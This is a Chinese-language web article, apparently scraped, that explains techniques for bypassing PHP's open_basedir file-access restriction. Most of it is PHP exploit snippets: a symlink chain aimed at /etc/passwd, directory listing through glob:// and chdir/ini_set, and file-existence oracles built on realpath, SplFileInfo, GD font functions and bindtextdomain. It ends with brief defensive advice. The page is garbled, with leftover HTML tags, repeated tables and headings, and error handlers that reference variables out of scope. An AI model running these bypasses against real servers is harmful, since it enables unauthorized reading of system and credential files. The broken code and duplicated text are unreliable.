Open_basedir绕过技术详解<\/h1>

1. Open_basedir简介<\/h2>
Open_basedir是PHP中用于限制文件系统访问范围的安全机制，它将PHP的文件操作限制在指定的目录集合中。<\/p>

基本特性：<\/h3>

所有PHP文件读写函数都会经过open_basedir检查<\/li>
在Linux系统中使用冒号(:)分隔目录，如\/var\/www\/:\/tmp\/<\/code><\/li>

在Windows系统中使用分号(;)分隔目录，如c:\/www;c:\/windows\/temp<\/code><\/li>
<\/ul>
2. 绕过技术分类<\/h2>
2.1 Globe伪协议结合DirectoryIterator<\/h3>
适用条件<\/strong>：<\/p>

PHP版本 > 5.3<\/li>
Linux环境<\/li>
<\/ul>
示例代码<\/strong>：<\/p>
$result =<\/span> array<\/span>();
<\/span><\/span>$mulu =<\/span> new<\/span> DirectoryIterator<\/span>("glob:\/\/\/*"<\/span>);
<\/span><\/span>foreach<\/span>($mulu as<\/span> $a){
<\/span><\/span>    $result[] =<\/span> $a-><\/span>__toString<\/span>();
<\/span><\/span>}
<\/span><\/span>sort<\/span>($result);
<\/span><\/span>foreach<\/span>($result as<\/span> $s){
<\/span><\/span>    echo<\/span> "<\/span>{<\/span>$s}<\/span><br\/>"<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>限制<\/strong>：<\/p>

只能列出根目录和open_basedir允许目录下的文件<\/li>
不能读取文件内容<\/li>
<\/ul>
2.2 opendir()+readdir()+glob:\/\/组合<\/h3>
示例代码<\/strong>：<\/p>
$a =<\/span> $_GET['c'<\/span>];
<\/span><\/span>if<\/span>($b =<\/span> opendir<\/span>($a)){
<\/span><\/span>    while<\/span>(($file =<\/span> readdir<\/span>($b)) !==<\/span> false<\/span>){
<\/span><\/span>        echo<\/span> $file.<\/span>"<br>"<\/span>;
<\/span><\/span>    }
<\/span><\/span>    closedir<\/span>($b);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.3 符号链接(Symlink)绕过<\/h3>
原理<\/strong>：

通过创建多层目录和符号链接，构造一个指向受限文件的路径。<\/p>
示例代码<\/strong>：<\/p>
mkdir<\/span>("A"<\/span>);
<\/span><\/span>chdir<\/span>("A"<\/span>);
<\/span><\/span>mkdir<\/span>("B"<\/span>);
<\/span><\/span>chdir<\/span>("B"<\/span>);
<\/span><\/span>mkdir<\/span>("C"<\/span>);
<\/span><\/span>chdir<\/span>("C"<\/span>);
<\/span><\/span>mkdir<\/span>("D"<\/span>);
<\/span><\/span>chdir<\/span>("D"<\/span>);
<\/span><\/span>chdir<\/span>(".."<\/span>);chdir<\/span>(".."<\/span>);chdir<\/span>(".."<\/span>);chdir<\/span>(".."<\/span>);
<\/span><\/span>symlink<\/span>("A\/B\/C\/D"<\/span>, "SD"<\/span>);
<\/span><\/span>symlink<\/span>("SD\/etc\/passwd"<\/span>, "POC"<\/span>);
<\/span><\/span>unlink<\/span>("SD"<\/span>);
<\/span><\/span>mkdir<\/span>("SD"<\/span>);
<\/span><\/span><\/code><\/pre>完整EXP<\/strong>：<\/p>
\/\/ 详细EXP见原文，包含路径计算和清理功能
<\/span><\/span><\/span><\/code><\/pre>2.4 realpath函数特性利用<\/h3>
原理<\/strong>：<\/p>

当路径不存在时返回false<\/li>
当路径存在但不在open_basedir内时抛出错误<\/li>
<\/ul>
Windows环境示例<\/strong>：<\/p>
ini_set<\/span>('open_basedir'<\/span>, dirname<\/span>(__FILE__<\/span>));
<\/span><\/span>set_error_handler<\/span>('isexists'<\/span>);
<\/span><\/span>$dir =<\/span> 'd:\/test\/'<\/span>;
<\/span><\/span>$chars =<\/span> 'abcdefghijklmnopqrstuvwxyz0123456789_'<\/span>;
<\/span><\/span>
<\/span><\/span>for<\/span>($i=<\/span>0<\/span>;$i<<\/span>strlen<\/span>($chars);$i++<\/span>){
<\/span><\/span>    $file =<\/span> $dir.<\/span>$chars[$i].<\/span>'<>'<\/span>;
<\/span><\/span>    realpath<\/span>($file);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> isexists<\/span>($errno, $errstr){
<\/span><\/span>    if<\/span>(strpos<\/span>($errstr, 'File is not within'<\/span>) !==<\/span> false<\/span>){
<\/span><\/span>        echo<\/span> "Found: "<\/span>.<\/span>substr<\/span>($file, 0<\/span>, -<\/span>2<\/span>).<\/span>"<br\/>"<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.5 SplFileInfo::getRealPath方法<\/h3>
特点<\/strong>：<\/p>

完全不考虑open_basedir限制<\/li>
路径存在时返回绝对路径，不存在时返回false<\/li>
<\/ul>
示例代码<\/strong>：<\/p>
$basedir =<\/span> 'D:\/test\/'<\/span>;
<\/span><\/span>$chars =<\/span> 'abcdefghijklmnopqrstuvwxyz0123456789'<\/span>;
<\/span><\/span>
<\/span><\/span>for<\/span>($i=<\/span>0<\/span>;$i<<\/span>strlen<\/span>($chars);$i++<\/span>){
<\/span><\/span>    $info =<\/span> new<\/span> SplFileInfo<\/span>($basedir.<\/span>$chars[$i].<\/span>'<>'<\/span>);
<\/span><\/span>    $re =<\/span> $info-><\/span>getRealPath<\/span>();
<\/span><\/span>    if<\/span>($re){
<\/span><\/span>        echo<\/span> $re.<\/span>'<br\/>'<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.6 chdir与ini_set组合<\/h3>
原理<\/strong>：

通过改变当前目录和动态修改open_basedir设置来绕过限制。<\/p>
示例代码<\/strong>：<\/p>
mkdir<\/span>('sub'<\/span>);
<\/span><\/span>chdir<\/span>('sub'<\/span>);
<\/span><\/span>ini_set<\/span>('open_basedir'<\/span>, '..'<\/span>);
<\/span><\/span>chdir<\/span>('..'<\/span>);chdir<\/span>('..'<\/span>);chdir<\/span>('..'<\/span>);chdir<\/span>('..'<\/span>);
<\/span><\/span>ini_set<\/span>('open_basedir'<\/span>, '\/'<\/span>);
<\/span><\/span>var_dump<\/span>(scandir<\/span>('\/'<\/span>));
<\/span><\/span><\/code><\/pre>2.7 GD库函数利用<\/h3>
使用函数<\/strong>：<\/p>

imageftbbox()<\/li>
imagefttext()<\/li>
<\/ul>
原理<\/strong>：

通过不同的错误信息区分文件是否存在：<\/p>

文件存在："File(xxxxx) is not within the allowed path(s)"<\/li>
文件不存在："Invalid font filename"<\/li>
<\/ul>
示例代码<\/strong>：<\/p>
$dir =<\/span> 'd:\/test\/'<\/span>;
<\/span><\/span>$chars =<\/span> 'abcdefghijklmnopqrstuvwxyz0123456789_'<\/span>;
<\/span><\/span>
<\/span><\/span>for<\/span>($i=<\/span>0<\/span>;$i<<\/span>strlen<\/span>($chars);$i++<\/span>){
<\/span><\/span>    $file =<\/span> $dir.<\/span>$chars[$i].<\/span>'<>'<\/span>;
<\/span><\/span>    imageftbbox<\/span>(100<\/span>, 100<\/span>, $file, 'aaa'<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> isexists<\/span>($errno, $errstr){
<\/span><\/span>    if<\/span>(stripos<\/span>($errstr, 'Invalid font filename'<\/span>) ===<\/span> false<\/span>){
<\/span><\/span>        echo<\/span> "Found: "<\/span>.<\/span>$file.<\/span>"<br\/>"<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.8 bindtextdomain函数<\/h3>
限制<\/strong>：<\/p>

Windows下默认不可用<\/li>
Linux下不能使用通配符<\/li>
<\/ul>
示例代码<\/strong>：<\/p>
$re =<\/span> bindtextdomain<\/span>('xxx'<\/span>, $_GET['dir'<\/span>]);
<\/span><\/span>var_dump<\/span>($re);
<\/span><\/span><\/code><\/pre>3. 技术对比与适用场景<\/h2>



方法<\/th>
适用系统<\/th>
PHP版本<\/th>
特点<\/th>
<\/tr>
<\/thead>


Globe+DirectoryIterator<\/td>
Linux<\/td>
>5.3<\/td>
只能列目录<\/td>
<\/tr>

Symlink<\/td>
跨平台<\/td>
通用<\/td>
需要写权限<\/td>
<\/tr>

realpath<\/td>
Windows<\/td>
通用<\/td>
基于错误判断<\/td>
<\/tr>

SplFileInfo<\/td>
跨平台<\/td>
>=5.1.2<\/td>
直接绕过<\/td>
<\/tr>

chdir+ini_set<\/td>
跨平台<\/td>
通用<\/td>
需要执行权限<\/td>
<\/tr>

GD库<\/td>
跨平台<\/td>
需GD扩展<\/td>
基于错误判断<\/td>
<\/tr>

bindtextdomain<\/td>
Linux<\/td>
通用<\/td>
效率较低<\/td>
<\/tr>
<\/tbody>
<\/table>
4. 防御建议<\/h2>

及时更新PHP版本<\/li>
限制危险函数的使用<\/li>
合理设置目录权限<\/li>
监控异常的文件系统操作<\/li>
结合其他安全机制如SELinux<\/li>
<\/ol>
5. 参考资源<\/h2>

PHP官方文档<\/a><\/li>
phithon的open_basedir绕过研究<\/a><\/li>
从PHP底层看open-basedir bypass<\/a><\/li>
阿里云安全社区文章<\/a><\/li>
<\/ol>

方法<\/th>	适用系统<\/th>	PHP版本<\/th>	特点<\/th> <\/tr> <\/thead>
Globe+DirectoryIterator<\/td>	Linux<\/td>	>5.3<\/td>	只能列目录<\/td> <\/tr>
Symlink<\/td>	跨平台<\/td>	通用<\/td>	需要写权限<\/td> <\/tr>
realpath<\/td>	Windows<\/td>	通用<\/td>	基于错误判断<\/td> <\/tr>
SplFileInfo<\/td>	跨平台<\/td>	>=5.1.2<\/td>	直接绕过<\/td> <\/tr>
chdir+ini_set<\/td>	跨平台<\/td>	通用<\/td>	需要执行权限<\/td> <\/tr>
GD库<\/td>	跨平台<\/td>	需GD扩展<\/td>	基于错误判断<\/td> <\/tr>
bindtextdomain<\/td>	Linux<\/td>	通用<\/td>	效率较低<\/td> <\/tr> <\/tbody> <\/table> 4. 防御建议<\/h2> 及时更新PHP版本<\/li> 限制危险函数的使用<\/li> 合理设置目录权限<\/li> 监控异常的文件系统操作<\/li> 结合其他安全机制如SELinux<\/li> <\/ol> 5. 参考资源<\/h2> PHP官方文档<\/a><\/li> phithon的open_basedir绕过研究<\/a><\/li> 从PHP底层看open-basedir bypass<\/a><\/li> 阿里云安全社区文章<\/a><\/li> <\/ol>

Open_basedir绕过技术详解<\/h1>

1. Open_basedir简介<\/h2> Open_basedir是PHP中用于限制文件系统访问范围的安全机制，它将PHP的文件操作限制在指定的目录集合中。<\/p>

2. 绕过技术分类<\/h2>

5. 参考资源<\/h2> PHP官方文档<\/a><\/li> phithon的open_basedir绕过研究<\/a><\/li> 从PHP底层看open-basedir bypass<\/a><\/li> 阿里云安全社区文章<\/a><\/li> <\/ol>

1. Open_basedir简介<\/h2>
Open_basedir是PHP中用于限制文件系统访问范围的安全机制，它将PHP的文件操作限制在指定的目录集合中。<\/p>

5. 参考资源<\/h2>

PHP官方文档<\/a><\/li>
phithon的open_basedir绕过研究<\/a><\/li>
从PHP底层看open-basedir bypass<\/a><\/li>
阿里云安全社区文章<\/a><\/li> <\/ol>